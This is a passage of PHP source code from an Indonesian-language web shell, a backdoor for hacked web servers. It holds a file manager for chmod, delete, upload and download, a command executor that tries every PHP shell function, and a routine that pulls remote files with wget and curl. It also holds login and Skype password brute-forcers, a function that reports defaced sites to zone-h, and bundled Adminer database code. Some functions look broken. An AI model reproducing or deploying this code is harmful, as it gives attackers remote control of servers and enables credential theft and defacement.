  1512. <td align=center><a id="'.clearspace($r).'_chmod" href="javascript:tukar(\''.clearspace($r).'_chmod\',\''.clearspace($r).'_form3\')" title="Chmod folder '.$r.' '.substr(sprintf('%o',fileperms($t.$r)),-4).'"> '.substr(sprintf('%o',fileperms($t.$r)),-4).'</a>
  1513. <!-- chmod -->
  1514. <div id="'.clearspace($r).'_form3" class="sembunyi" style="margin:0;padding:0;">
  1515. <form action="?dm='.$t.'" method="post" style="display:inline-block">
  1516. <input type="hidden" name="name" value="'.$r.'" style="margin:0;padding:0;" />
  1517. <input class="inputz" style="width:45px;" type="text" name="newvalue" value="'.substr(sprintf('%o',fileperms($t.$r)),-4).'" />
  1518. <button class="inputzbut" type="submit" name="chmod_folder"><i class="fa fa-check-circle"></i></button>
  1519. </form>
  1520. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_form3\',\''.clearspace($r).'_chmod\')" /><i class="fa fa-times"></i></button>
  1521. </div>
  1522. </td>
  1523. <td align=center>'.$q.'</td>
  1524. <td align=center>'.date("d-M-Y H:i",fileatime($r)).'</td>
  1525. <td align=center>
  1526. <div id="'.clearspace($r).'_linkup">
  1527. <a title="Ganti Nama '.$r.'" href="javascript:tukar(\''.clearspace($r).'_link\',\''.clearspace($r).'_form\')"><i class="fa fa-clipboard"></i></a> &nbsp;
  1528. &nbsp;<span class="infodmx">||</span>&nbsp;
  1529. &nbsp; <a href="?dm='.$t.'&amp;fdelete='.$t.$r.'" title="Hapus '.$r.'" onclick="return confirm(\'Hapus folder '.$r.'?\')"><i class="fa fa-trash"></i></a> &nbsp;
  1530. &nbsp;<span class="infodmx">||</span>&nbsp;
  1531. &nbsp; <a title="Upload" href="javascript:tukar(\''.clearspace($r).'_linkup\',\''.clearspace($r).'_formup\')"><i class="fa fa-cloud-upload"></i></a> &nbsp;
  1532. &nbsp;<span class="infodmx">||</span>&nbsp;
  1533. &nbsp; <a title="Download zip '.$r.'" href="?dm='.$t.'&amp;dlzip='.$t.$r.'" onclick="return confirm(\'Download zip '.$r.'?\')"><i class="fa fa-file-archive-o dlzip"></i></a>
  1534. </div>
  1535. <!-- upload -->
  1536. <div id="'.clearspace($r).'_formup" class="sembunyi" style="margin:0;padding:0;">
  1537. <form action="" method="post" enctype="multipart/form-data" style="display:inline-block">
  1538. <input type="hidden" name="dm" value="'.$t.$r.DIRECTORY_SEPARATOR.'" />
  1539. <input type="file" name="file" size="20"/>
  1540. <input name="path" type="hidden" value="'.$t.$r.DIRECTORY_SEPARATOR.'" />
  1541. <button class="inputzbut" type="submit" name="_upl"><i class="fa fa-check-circle"></i></button>
  1542. </form>
  1543. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_formup\',\''.clearspace($r).'_linkup\')" /><i class="fa fa-times"></i></button>
  1544. </div>
  1545. </td></tr>';
  1546. }
  1547. }
  1548. foreach($a as $k){
  1549. $u=$t.$k;
  1550. if(!$win&&$g){
  1551. $q=owneruser($k);
  1552. }else{$q=$h;}
  1553. $s.='<tr><td>';
  1554.  
  1555. if(extensionfile($u,array('jpeg','gif','ico','bmp','jpg','png'))){
  1556. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'&amp;type=image" title="'.$k.'" target="_blank"><i class="fa fa-file-image-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1557. }elseif(extensionfile($u,array('bz2','tar','gz','7z','rar','zip'))){
  1558. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-archive-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1559. }elseif(extensionfile($u,array('css','js','txt','htaccess','ini'))){
  1560. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-text-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1561. }elseif(extensionfile($u,array('pdf'))){
  1562. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-pdf-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1563. }elseif(extensionfile($u,array('m4a','amr','caa','mp3','ogg','mogg','mog','m4b','wma'))){
  1564. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-audio-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1565. }elseif(extensionfile($u,array('webm','flv','mp4','3gp','vob','avi','wmv','mpeg'))){
  1566. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-video-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1567. }elseif(extensionfile($u,array('doc','dot','wbk','docx','docm','dotx','dotm','docb'))){
  1568. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-word-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1569. }elseif(extensionfile($u,array('xls','xlt','xlm','xlsx','xlsm','xltx','xltm','xlsb','xla','xlam','xll','xlw'))){
  1570. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-excel-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1571. }elseif(extensionfile($u,array('ppt','pot','pps','pptx','pptm','potx','potm','ppam','ppsx','ppsm','sldx','sldm'))){
  1572. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-powerpoint-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1573. }else{
  1574. $s.='<a id="'.clearspace($k).'_link" href="?dm='.$t.'&amp;view='.$u.'" title="'.$k.'" target="_blank"><i class="fa fa-file-code-o fa-lg"></i><!--<img src="'.$f.'">-->&nbsp;'.$k.'</a>';
  1575. }
  1576. $s.='<div id="'.clearspace($k).'_form" class="sembunyi" style="margin:0;padding:0;">
  1577. <form action="?dm='.$t.'" method="post" style="display:inline-block">
  1578. <input type="hidden" name="oldname" value="'.$k.'" style="margin:0;padding:0;" />
  1579. <input class="inputz" style="width:200px;" type="text" name="newname" value="'.$k.'" />
  1580. <button class="inputzbut" type="submit" name="rename"><i class="fa fa-check-circle"></i></button>
  1581. </form>
  1582. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($k).'_form\',\''.clearspace($k).'_link\')" /><i class="fa fa-times"></i></button>
  1583. </div>
  1584. </td>
  1585. <td align=center><a title="'.$k.' => '.ukuran($u).'">'.ukuran($u).'</a></td>
  1586. <td align=center>
  1587. <a id="'.clearspace($k).'_newvalue" href="javascript:tukar(\''.clearspace($k).'_newvalue\',\''.clearspace($k).'_form2\')" title="Chmod file '.$k.' '.substr(sprintf('%o',fileperms($u)),-4).'">'.substr(sprintf('%o',fileperms($u)),-4).'</a>
  1588. <div id="'.clearspace($k).'_form2" class="sembunyi" style="margin:0;padding:0;">
  1589. <form action="?dm='.$t.'" method="post" style="display:inline-block">
  1590. <input type="hidden" name="name" value="'.$k.'" style="margin:0;padding:0;" />
  1591. <input class="inputz" style="width:45px;" type="text" name="newvalue" value="'.substr(sprintf('%o',fileperms($u)),-4).'" />
  1592. <button class="inputzbut" type="submit" name="chmod"><i class="fa fa-check-circle"></i></button>
  1593. </form>
  1594. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($k).'_form2\',\''.clearspace($k).'_newvalue\')" /><i class="fa fa-times"></i></button>
  1595. </div>
  1596. </td>
  1597. <td align=center>'.$q.'</td>
  1598. <td align=center>'.date("d-M-Y H:i",fileatime($u)). '</td>
  1599. <td align=center><a href="?dm='.$t.'&amp;ed='.$u.'" title="Edit '.$k.'"><i class="fa fa-pencil-square-o"></i></a>
  1600. <span class="infodmx">&nbsp;||&nbsp;</span>
  1601. <a href="javascript:tukar(\''.clearspace($k).'_link\',\''.clearspace($k).'_form\')" title="Ganti Nama '.$k.'"><i class="fa fa-clipboard"></i></a>
  1602. <span class="infodmx">&nbsp;||&nbsp;</span>
  1603. <a href="?dm='.$t.'&amp;delete='.$u.'" title="Hapus '.$k.'" onclick="return confirm(\'Hapus file '.$k.'?\')"><i class="fa fa-trash"></i></a>
  1604. <span class="infodmx">&nbsp;||&nbsp;</span>
  1605. <a href="?dm='.$t.'&amp;dl='.$u.'" title="Download '.$k.'" onclick="return confirm(\'Download '.$k.'?\')"><i class="fa fa-cloud-download"></i></a>
  1606. <span class="infodmx">&nbsp;||&nbsp;</span>
  1607. <a href="?dm='.$t.'&amp;dlzip='.$u.'" title="Download zip '.$k.'" onclick="return confirm(\'Download zip '.$k.'?\')"><i class="fa fa-file-archive-o dlzip"></i></a>
  1608. </td></tr>';
  1609. }
  1610. $s.='<tr><th colspan="6"></th></tr></table>';
  1611. return $s;
  1612. }
  1613.  
  1614. function ukuran($x){
  1615. $a=@filesize($x);
  1616. if($a>1073741824){
  1617. $a=number_format($a/1073741824,2).' GB';
  1618. }elseif($a>1048576){
  1619. $a=number_format($a/1048576,2).' MB';
  1620. }elseif($a>1024){
  1621. $a=number_format($a/1024,2).' KB';
  1622. }elseif($a>1){
  1623. $a=$a.' Byte';
  1624. }elseif($a==1){
  1625. $a=$a.' Byte';
  1626. }else {
  1627. $a='0 Byte';
  1628. }
  1629. return $a;
  1630. }
  1631. function ukurans($a){
  1632. $b=filesize($a);
  1633. $c=array(' Byte',' KB',' MB',' GB',' TB',' PB',' EB',' ZB',' YB');
  1634. $d=$b>0?floor(log($b,1024)):0;
  1635. return number_format($b/pow(1024,$d),2,'.',',').$c[$d];
  1636. }
  1637. function exe($a){
  1638. $b='';
  1639. $a=$a.' 2>&1';
  1640. if(function_exists('system')){
  1641. if(is_callable('system')) {
  1642. ob_start();
  1643. system($a);
  1644. $b=ob_get_contents();
  1645. ob_end_clean();
  1646. if(!empty($b)) {
  1647. return $b;
  1648. }
  1649. }
  1650. }elseif(function_exists('shell_exec')) {
  1651. if(is_callable('shell_exec')) {
  1652. $b=shell_exec($a);
  1653. if(!empty($b)) {
  1654. return $b;
  1655. }
  1656. }
  1657. }elseif(function_exists('exec')) {
  1658. if(is_callable('exec')) {
  1659. exec($a,$c);
  1660. if(!empty($c)) {
  1661. foreach($c as $d) {
  1662. $b.=$d;
  1663. }
  1664. if(!empty($b)) {
  1665. return $b;
  1666. }
  1667. }
  1668. }
  1669. }elseif(function_exists('passthru')) {
  1670. if(is_callable('passthru')) {
  1671. ob_start();
  1672. passthru($a);
  1673. $b=ob_get_contents();
  1674. ob_end_clean();
  1675. if(!empty($b)) {
  1676. return $b;
  1677. }
  1678. }
  1679. }elseif(function_exists('proc_open')) {
  1680. if(is_callable('proc_open')) {
  1681. $e=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));
  1682. $f=proc_open($a,$e,$g, getcwd(), array());
  1683. if(is_resource($f)) {
  1684. while($h=fgets($g[1])) {
  1685. if(!empty($h))
  1686. $b.=$h;
  1687. }
  1688. while($i=fgets($g[2])) {
  1689. if(!empty($i))
  1690. $b.=$i;
  1691. }
  1692. }
  1693. proc_close($f);
  1694. if(!empty($b)) {
  1695. return $b;
  1696. }
  1697. }
  1698. }elseif(function_exists('popen')) {
  1699. if(is_callable('popen')) {
  1700. $j=popen($a, 'r');
  1701. if($j) {
  1702. while(!feof($j)) {
  1703. $b.=fread($j, 2096);
  1704. }
  1705. pclose($j);
  1706. }
  1707. if(!empty($b)) {
  1708. return $b;
  1709. }
  1710. }
  1711. }
  1712. return '';
  1713. }
  1714. function tulis($a,$b){
  1715. $d=gzinflate(base64_decode($b));
  1716. $c=fopen($a,'w');
  1717. if($c){
  1718. fputs($c,$d);
  1719. fclose($a);
  1720. }
  1721. }
  1722. function simpan($a,$b){
  1723. if(is_writable(getcwd())){
  1724. $c=fopen($a,'w');
  1725. fputs($c,$b);
  1726. fclose($c);
  1727. return true;
  1728. }else{
  1729. return false;
  1730. }
  1731. }
  1732. function ambil($a,$b){
  1733. $c=fopen($a,'r');
  1734. if($c){
  1735. while(!feof($c)){
  1736. $c.=fread($c, 1024);
  1737. }
  1738. fclose($c);
  1739. $d=@fopen($b, 'w');
  1740. fwrite($d,$c);
  1741. fclose($d);
  1742. }
  1743. }
  1744. function which($a){
  1745. $b=exe("which $a");
  1746. if(!empty($b)) {
  1747. return trim($b);
  1748. }else{
  1749. return trim($a);
  1750. }
  1751. }
  1752. function download($a,$b){
  1753. $c=basename($b);
  1754. switch($a) {
  1755. case 'ccurl':
  1756. $d=curl_init();
  1757. curl_setopt($d, CURLOPT_URL,$b);
  1758. curl_setopt($d, CURLOPT_RETURNTRANSFER, 1);
  1759. curl_setopt($d, CURLOPT_FOLLOWLOCATION, 1);
  1760. $e=curl_exec($d);
  1761. curl_close($d);
  1762. simpan($c,$e);
  1763. break;
  1764. case 'wwget':
  1765. exe(which('wget')." ".$b." -O ".$c);
  1766. break;
  1767. case 'wlynx':
  1768. exe(which('lynx')." -source ".$b." >".$c);
  1769. break;
  1770. case 'wfread':
  1771. ambil($b,$c);
  1772. break;
  1773. case 'wfetch':
  1774. exe(which('fetch')." -o ".$c." -p ".$b);
  1775. break;
  1776. case 'wlinks':
  1777. exe(which('links')." -source ".$b." >".$c);
  1778. break;
  1779. case 'wget':
  1780. exe(which('GET')." ".$b." >".$c);
  1781. break;
  1782. case 'wcurl':
  1783. exe(which('curl')." ".$b." -o ".$c);
  1784. break;
  1785. default:
  1786. break;
  1787. }
  1788. return $c;
  1789. }
  1790. function get_perms($a){
  1791. if($b=@fileperms($a)){
  1792. $c='';
  1793. $c.=($b&00400)?'r':'-';
  1794. $c.=($b&00200)?'w':'-';
  1795. $c.=($b&00100)?'x':'-';
  1796. $c.=($b&00040)?'r':'-';
  1797. $c.=($b&00020)?'w':'-';
  1798. $c.=($b&00010)?'x':'-';
  1799. $c.=($b&00004)?'r':'-';
  1800. $c.=($b&00002)?'w':'-';
  1801. $c.=($b&00001)?'x':'-';
  1802. return $c;
  1803. }else{
  1804. return '?????';
  1805. }
  1806. }
  1807. function clearspace($a){
  1808. return str_replace(" ","_",$a);
  1809. }
  1810. function CleanDir($a){
  1811. $a=str_replace("\\","/",$a);
  1812. $a=str_replace("//","/",$a);
  1813. return $a;
  1814. }
  1815. function dmprocess(){
  1816. if(!$win) {
  1817. $handler="ps -aux" . ($grep?" | grep '" . addslashes($grep)."'":"");
  1818. }else{
  1819. $handler="tasklist";
  1820. }
  1821. $ret=myshellexec($handler);
  1822. if(!$ret) {
  1823. echo "Can't execute \"".$handler."\"!";
  1824. }else{
  1825. if(empty($processes_sort)) {
  1826. $processes_sort=$sort_default;
  1827. }
  1828. $parsesort=parsesort($processes_sort);
  1829. if(!is_numeric($parsesort[0])) {
  1830. $parsesort[0]=0;
  1831. }
  1832. $k=$parsesort[0];
  1833. $ret=htmlspecialchars($ret);
  1834. if(!$win) {
  1835. if($pid) {
  1836. if(is_null($sig)) {
  1837. $sig=9;
  1838. }
  1839. echo "Sending signal ".$sig." to #".$pid."... ";
  1840. if(posix_kill($pid,$sig)) {
  1841. echo "OK.";
  1842. }else{
  1843. echo "ERROR.";
  1844. }
  1845. }
  1846. while(preg_match(" ",$ret)) {
  1847. $ret=str_replace(" "," ",$ret);
  1848. }
  1849. $stack=explode("\n",$ret);
  1850. $head=explode(" ",$stack[0]);
  1851. unset($stack[0]);
  1852. $prcs=array();
  1853. foreach($stack as $line) {
  1854. if(!empty($line)) {
  1855. echo "<tr>";
  1856. $line=explode(" ",$line);
  1857. $line[10]=join(" ",array_slice($line, 10));
  1858. $line=array_slice($line, 0, 11);
  1859. $prcs[]=$line;
  1860. echo "</tr>";
  1861. }
  1862. }
  1863. }else{
  1864. while(preg_match(" ",$ret)) {
  1865. $ret=str_replace(" ","",$ret);
  1866. }
  1867. while(preg_match(" ",$ret)) {
  1868. $ret=str_replace(" ","",$ret);
  1869. }
  1870. while(preg_match(" ",$ret)) {
  1871. $ret=str_replace(" ","",$ret);
  1872. }
  1873. while(preg_match(" ",$ret)) {
  1874. $ret=str_replace(" ","",$ret);
  1875. }
  1876. while(preg_match(" ",$ret)) {
  1877. $ret=str_replace(" ","",$ret);
  1878. }
  1879. while(preg_match(" ",$ret)) {
  1880. $ret=str_replace(" ","",$ret);
  1881. }
  1882. while(preg_match(" ",$ret)) {
  1883. $ret=str_replace(" ","",$ret);
  1884. }
  1885. while(preg_match(" ",$ret)) {
  1886. $ret=str_replace(" ","",$ret);
  1887. }
  1888. while(preg_match(" ",$ret)) {
  1889. $ret=str_replace(" ","",$ret);
  1890. }
  1891. while(preg_match(" ",$ret)) {
  1892. $ret=str_replace(" ","",$ret);
  1893. }
  1894. while(preg_match(" ",$ret)) {
  1895. $ret=str_replace(" ","",$ret);
  1896. }
  1897. $ret=convert_cyr_string($ret, "d","w");
  1898. $stack=explode("\n",$ret);
  1899. unset($stack[0],$stack[2]);
  1900. $stack=array_values($stack);
  1901. $head=explode("",$stack[0]);
  1902. $head[1]=explode(" ",$head[1]);
  1903. $head[1]=$head[1][0];
  1904. $stack=array_slice($stack, 1);
  1905. unset($head[2]);
  1906. $head=array_values($head);
  1907. if($k>count($head)) {
  1908. $k=count($head)-1;
  1909. }
  1910. $prcs=array();
  1911. foreach($stack as $line) {
  1912. if(!empty($line)) {
  1913. echo "<tr>";
  1914. $line=explode("",$line);
  1915. $line[1]=intval($line[1]);
  1916. $line[2]=$line[3];
  1917. unset($line[3]);
  1918. $line[2]=intval(str_replace(" ","",$line[2]))*1024;
  1919. $prcs[]=$line;
  1920. echo "</tr>";
  1921. }
  1922. }
  1923. }
  1924. $head[$k]="<b>".$head[$k]."</b>".$y;
  1925. $v=$processes_sort[0];
  1926. if($processes_sort[1]=="d") {
  1927. $prcs=array_reverse($prcs);
  1928. }
  1929. $tab=array();
  1930. $tab[]=$head;
  1931. $tab=array_merge($tab,$prcs);
  1932. echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
  1933. foreach($tab as $i=>$k) {
  1934. echo "<tr>";
  1935. foreach($k as $j=>$v) {
  1936. if($win and $i>0 and $j==2) {
  1937. $v=view_size($v);
  1938. }
  1939. echo "<td>".$v."</td>";
  1940. }
  1941. echo "</tr>";
  1942. }
  1943. echo "</table>";
  1944. }
  1945. }
  1946. function curPageURL(){
  1947. $pageURLe='http';
  1948. if($_SERVER["HTTPS"]=="on") {
  1949. $pageURL.="s";
  1950. }
  1951. $pageURLe.="://";
  1952. if($_SERVER["SERVER_PORT"]!="80") {
  1953. $pageURLe.=$_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
  1954. }else{
  1955. $pageURLe.=$_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
  1956. }
  1957. return $pageURLe;
  1958. }
  1959. function brute($site,$username,$password){
  1960. $curl=curl_init();
  1961. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1962. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  1963. curl_setopt($curl, CURLOPT_URL,$site);
  1964. curl_setopt($curl, CURLOPT_POSTFIELDS, "user_name={$username}&user_pass={$password}");
  1965. curl_setopt($curl, CURLOPT_COOKIEJAR, "cookie.txt");
  1966. curl_setopt($curl, CURLOPT_COOKIEFILE, "cookie.txt");
  1967. $brute=curl_exec($curl);
  1968. if(preg_match('/<p align="center"><b><font size="4" color="#FFFFFF">/',$brute)) {
  1969. echo "<center><b><font face='Tahoma' size='2'>[+] Cracked Username:<font color='#FF0000'>{$username}</font> &amp; Password:<font color='#FF0000'>{$password}</font></font></b>";
  1970. }
  1971. return $brute;
  1972. }
  1973. function url_exists($strURL){
  1974. $resURL=curl_init();
  1975. curl_setopt($resURL, CURLOPT_URL,$strURL);
  1976. curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  1977. curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  1978. curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  1979. curl_exec($resURL);
  1980. $intReturnCode=curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  1981. curl_close($resURL);
  1982. if($intReturnCode!=200) {
  1983. return false;
  1984. }else{
  1985. return true;
  1986. }
  1987. }
  1988. function is_url_exist($url){
  1989. $ch=curl_init($url);
  1990. curl_setopt($ch, CURLOPT_NOBODY, true);
  1991. curl_exec($ch);
  1992. $code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1993. if($code==200) {
  1994. $status=true;
  1995. }else{
  1996. $status=false;
  1997. }
  1998. curl_close($ch);
  1999. return $status;
  2000. }
  2001. function filter($string){
  2002. if(get_magic_quotes_gpc()!=0) {
  2003. return stripslashes($string);
  2004. }else{
  2005. return $string;
  2006. }
  2007. }
  2008. function RemoveLastSlash($host) {
  2009. if(strrpos($host, '/', -1)==strlen($host)-1) {
  2010. return substr($host, 0, strrpos($host, '/', -1));
  2011. }else{
  2012. return $host;
  2013. }
  2014. }
  2015. function get_string_between($string,$start,$end){
  2016. $string=" ".$string;
  2017. $ini=strpos($string,$start);
  2018. if($ini==0)
  2019. return "";
  2020. $ini+=strlen($start);
  2021. $len=strpos($string,$end,$ini)-$ini;
  2022. return substr($string,$ini,$len);
  2023. }
  2024. function dec($a,$b){
  2025. $d=md5(md5($b)) . md5($b);
  2026. $f=_hash($d);
  2027. $g=strlen($f);
  2028. $a=base64_decode($a);
  2029. $e=substr($a, 0,$g);
  2030. $a=substr($a,$g, strlen($a)-$g);
  2031. $h=$i='';
  2032. $c=0;
  2033. while($c<$g) {
  2034. $h.=chr(ord($e[$c])^ord($f[$c]));
  2035. ++$c;
  2036. }
  2037. $d=$h;
  2038. $c=0;
  2039. while($c<strlen($a)) {
  2040. if(($c!=0AND$c%$g==0)) {
  2041. $d=_hash($d . substr($i,$c-$g,$g));
  2042. }
  2043. $i.=chr(ord($d[$c%$g])^ord($a[$c]));
  2044. ++$c;
  2045. }
  2046. return $i;
  2047. }
  2048. function _hash($a){
  2049. $b=(function_exists('sha1'))?sha1($a):md5($a);
  2050. $d='';
  2051. $c=0;
  2052. while($c<strlen($b)) {
  2053. $d.=chr(hexdec($b[$c] . $b[$c+1]));
  2054. $c+=2;
  2055. }
  2056. return $d;
  2057. }
  2058. function xsecurity($skype){
  2059. $ch=curl_init();
  2060. curl_setopt($ch,CURLOPT_URL,$skype);
  2061. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER, false);
  2062. curl_setopt($ch,CURLOPT_HEADER, 1);
  2063. curl_setopt($ch,CURLOPT_POST, 1);
  2064. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  2065. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  2066. curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  2067. $run=curl_exec($ch);
  2068. preg_match('/<input type="hidden" name="session_token" value="(.*?)"/',$run,$hash);
  2069. preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/',$run,$piie);
  2070. preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/',$run,$etmm);
  2071. return $hash[1]."|:|".$piie[1]."|:|".$etmm[1];
  2072. }
  2073. /*
  2074. $xsec=explode("|:|",xsecurity($skype));
  2075. $token=$xsec[0];
  2076. $pie=$xsec[1];
  2077. $etm=$xsec[2];
  2078. */
  2079. function bruteskype($skype,$username,$pass,$header){
  2080. $ch=curl_init();
  2081. curl_setopt($ch, CURLOPT_URL,$skype);
  2082. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2083. curl_setopt($ch, CURLOPT_HEADER, 1);
  2084. curl_setopt($ch, CURLOPT_POST, 1);
  2085. curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin");
  2086. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  2087. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  2088. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2089. $brute=curl_exec($ch);
  2090. if(strstr($brute,$header)) {
  2091. echo "<br><br><center><span class='b11'>[+] Password Cracked is <b>{$pass}</b> => <b>{$username}</b></span></center>";
  2092. }
  2093. return $brute;
  2094. }
  2095. function zoneh($a,$b){
  2096. $c=curl_init();
  2097. curl_setopt($c,CURLOPT_RETURNTRANSFER,1);
  2098. curl_setopt($c,CURLOPT_POST,1);
  2099. curl_setopt($c,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0');
  2100. curl_setopt($c,CURLOPT_URL,"http://www.zone-h.com/notify/single");
  2101. curl_setopt($c,CURLOPT_POSTFIELDS,"defacer=$b&domain1=$a&hackmode=1&reason=1");
  2102. $d=curl_exec($c);
  2103. //echo"<textarea>$d</textarea>";
  2104. if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$d)){
  2105. echo"<a href=\"$a\" target=\"_blank\"><span style=\"color:#0f0;\">$a OK</span></a><br>";
  2106. }else{
  2107. echo"<span style=\"color:red\">$a Error</span><br>";
  2108. }
  2109. curl_close ($c);
  2110. }
  2111. function toolurl($a){
  2112. if(function_exists('curl_version')){
  2113. $b=curl_init();
  2114. curl_setopt($b,CURLOPT_URL,$a);
  2115. curl_setopt($b,CURLOPT_RETURNTRANSFER,1);
  2116. curl_setopt($b,CURLOPT_FOLLOWLOCATION,1);
  2117. $c=curl_exec($b);
  2118. curl_close($b);
  2119. return $c;
  2120. }else{
  2121. return file_get_contents($a);
  2122. }
  2123. }
  2124.  
  2125. // Function Done
  2126.  
  2127. //function phpmyadmin
  2128.  
  2129. function connection() {
  2130. global $g;
  2131. return $g;
  2132. }
  2133. function adminer() {
  2134. global $b;
  2135. return $b;
  2136. }
  2137. function idf_unescape($u) {
  2138. $Sd=substr($u, -1);
  2139. return str_replace($Sd.$Sd,$Sd, substr($u, 1, -1));
  2140. }
  2141. function escape_string($X) {
  2142. return substr(q($X), 1, -1);
  2143. }
  2144. function number($X) {
  2145. return preg_replace('~[^0-9]+~','',$X);
  2146. }
  2147. function remove_slashes($Nf,$Jc=false) {
  2148. if(get_magic_quotes_gpc()) {
  2149. while(list($y,$X)=each($Nf)) {
  2150. foreach($X as $Id=>$W) {
  2151. unset($Nf[$y][$Id]);
  2152. if(is_array($W)) {
  2153. $Nf[$y][stripslashes($Id)]=$W;
  2154. $Nf[]=&$Nf[$y][stripslashes($Id)];
  2155. } else
  2156. $Nf[$y][stripslashes($Id)]=($Jc?$W:stripslashes($W));
  2157. }
  2158. }
  2159. }
  2160. }
  2161. function bracket_escape($u,$Ma=false) {
  2162. static $Dh=array(':'=>':1',']'=>':2','['=>':3','"'=>':4');
  2163. return strtr($u, ($Ma?array_flip($Dh):$Dh));
  2164. }
  2165. function charset($g) {
  2166. return (version_compare($g->server_info, "5.5.3")>=0?"utf8mb4":"utf8");
  2167. }
  2168. function h($Q) {
  2169. return str_replace("\0","&#0;",htmlspecialchars($Q, ENT_QUOTES, 'utf-8'));
  2170. }
  2171. function nbsp($Q) {
  2172. return (trim($Q)!=""?h($Q):"&nbsp;");
  2173. }
  2174. function nl_br($Q) {
  2175. return str_replace("\n","<br>",$Q);
  2176. }
  2177. function checkbox($C,$Y,$cb,$Pd="",$Se="",$hb="",$Qd="") {
  2178. $J="<input type='checkbox' name='$C' value='".h($Y)."'".($cb?" checked":"").($Qd?" aria-labelledby='$Qd'":"").($Se?' onclick="'.h($Se).'"':'').">";
  2179. return ($Pd!=""||$hb?"<label".($hb?" class='$hb'":"").">$J".h($Pd)."</label>":$J);
  2180. }
  2181. function optionlist($Ye,$zg=null,$bi=false) {
  2182. $J="";
  2183. foreach($Ye as $Id=>$W) {
  2184. $Ze=array($Id=>$W);
  2185. if(is_array($W)) {
  2186. $J.='<optgroup label="'.h($Id).'">';
  2187. $Ze=$W;
  2188. }
  2189. foreach($Ze as $y=>$X)
  2190. $J.='<option'.($bi||is_string($y)?' value="'.h($y).'"':'').(($bi||is_string($y)?(string) $y:$X)===$zg?' selected':'').'>'.h($X);
  2191. if(is_array($W))
  2192. $J.='</optgroup>';
  2193. }
  2194. return $J;
  2195. }
  2196. function html_select($C,$Ye,$Y="",$Re=true,$Qd="") {
  2197. if($Re)
  2198. return "<select name='".h($C)."'".(is_string($Re)?' onchange="'.h($Re).'"':"").($Qd?" aria-labelledby='$Qd'":"").">".optionlist($Ye,$Y)."</select>";
  2199. $J="";
  2200. foreach($Ye as $y=>$X)
  2201. $J.="<label><input type='radio' name='".h($C)."' value='".h($y)."'".($y==$Y?" checked":"").">".h($X)."</label>";
  2202. return $J;
  2203. }
  2204.  
  2205.  
  2206. function select_input($Ia,$Ye,$Y="",$_f="") {
  2207. return ($Ye?"<select$Ia><option value=''>$_f".optionlist($Ye,$Y, true)."</select>":"<input$Ia size='10' value='".h($Y)."' placeholder='$_f'>");
  2208. }
  2209. function confirm() {
  2210. return " onclick=\"return confirm('".'Are you sure?'."');\"";
  2211. }
  2212. function print_fieldset($t,$Xd,$mi=false,$Se="") {
